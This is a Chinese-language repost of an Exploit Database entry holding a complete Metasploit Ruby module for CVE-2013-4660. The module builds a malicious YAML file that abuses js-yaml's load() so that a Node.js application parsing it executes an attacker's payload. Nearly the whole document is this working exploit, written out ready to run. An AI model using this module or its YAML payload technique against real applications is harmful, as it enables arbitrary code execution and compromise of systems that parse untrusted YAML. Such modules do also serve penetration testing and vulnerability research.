Nodejs – ‘js-yaml load()’ Code Exec (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2013-09-30
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/28655/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::FILEFORMAT
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Nodejs js-yaml load() Code Exec',
  'Description'=> %q{
  For node.js applications that parse user-supplied YAML input using the
  load() function from the 'js-yaml' package < 2.0.5, specifying a self-executing
  function allows us to execute arbitrary javascript code.
  },
  'Author' => ['joev <jvennix[at]rapid7.com>'],
  'License'=> MSF_LICENSE,
  'References'=>
  [
  ['CVE', '2013-4660'],
  ['URL', 'https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/']
  ],
  'Platform' => 'nodejs',
  'Arch' => ARCH_NODEJS,
  'Privileged' => false,
  'Targets'=>[['Automatic', {}]],
  'DisclosureDate' => 'Jun 28 2013',
  'DefaultTarget'=> 0))
  
  register_options([
  OptString.new('FILENAME', [ true, 'The file name.', 'msf.yml'])
  ], self.class)
  end
  
  def exploit
  p = payload.encoded
  print_status("Creating '#{datastore['FILENAME']}' file...")
  file_create("a: !!js/function >\n(function(){ #{p} })();")
  end
  end